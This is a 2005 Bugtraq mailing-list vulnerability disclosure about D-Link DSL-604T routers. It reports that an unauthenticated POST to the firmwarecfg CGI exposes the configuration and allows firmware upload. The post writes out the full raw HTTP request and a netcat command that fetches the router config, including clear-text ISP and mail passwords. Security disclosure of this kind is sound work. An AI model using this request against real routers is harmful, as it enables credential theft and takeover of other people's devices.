Bugtraq mailing list archives
504T and now also 604T remote access.
From: alessandro <alessandro () sideralis net>
Date: Sat, 28 May 2005 16:34:20 +0200
Dear ZARAZA,the problem pointed out by Francesco Orro is completely different by the one i had. Yes, the file is the same, but if you continue reading, you can see what i just said:
the two bugs are completely different.The one i've described can be used even if is not the first access to the router, the opposite
of what is written in Orro's mail, method of exploitation is different too.Anyway, i found that dlink tried to fix this bug in DSL-604T series, but it seems that it
didn't so well. Here is another post about this other bug: Device: CUSTOMER=DLinkEU MODEL=DSL-604T Version: only tested with VERSION=V1.00B02T02.EU.20040610 Bugs: i) remote firmware upgrade without password ii) config retrieval without password Exploitation: remote Date: 27/05/2005 Status: vendor contacted Workaround: disable remote web management Author: Alessandro Audero The Bug DSL-604T is a D-Link router/ADSL modem with a linux system on it based on MIPS 4KEc V4.8. This is the uname that i found from the device i tested: Linux version 2.4.17_mvl21-malta-mips_fp_le (tiger () fd7 alphanetworks com) (gcc version 2.95.3 20010315 (release/MontaVista)) #71 Tue Feb 17 01:16:45 GMT 2004 It supports a remote web management console, that at first sigth asks for a username and a password. The URL should be something like this: http:://ipaddress/ and if you click on 'login' you'll get this other URL: http://ipaddress/cgi-bin/webcm that obviously tells you that you have typed in a wrong password. This router seems to fix previous 504T vulnerability, denying dir listing of /cgi-bin/ and calling firmwarecfg from a password protected page. But if you look at the source of the frame http://ipaddress/cgi-bin/webcm?getpage=../html/tools/updgateway.htm you can see that firmwarecfg is called with a post and that this action is allowed even if you don't know any password. Configuration and password retrieval is in this way possible. You can use a POST like this: POST /cgi-bin/firmwarecfg HTTP/1.1\r\n Host: 192.168.8.4\r\n User-Agent: yeah\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n Accept-Encoding: gzip,deflate\r\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n Keep-Alive: 300\r\n Connection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------------------41184676334\r\n
Content-Length: 234\r\n \r\n -----------------------------41184676334\r\n Content-Disposition: form-data; name="config.x"\r\n \r\n \r\n -----------------------------41184676334\r\n Content-Disposition: form-data; name="config.y"\r\n \r\n \r\n -----------------------------41184676334--\r\n \r\n Saving this stuff in a file and then doing something like that: cat lamepost.txt | nc ipaddress 80 > ipaddress.config.xml you have the router config in ipaddress.config.xml. Same trick of the previous paper: username and password are written in clear text, even those of the internet provider, mail, etc. That's all, folks. Alessandro Audero Rhapsody
Current thread:
- 504T and now also 604T remote access. alessandro (May 31)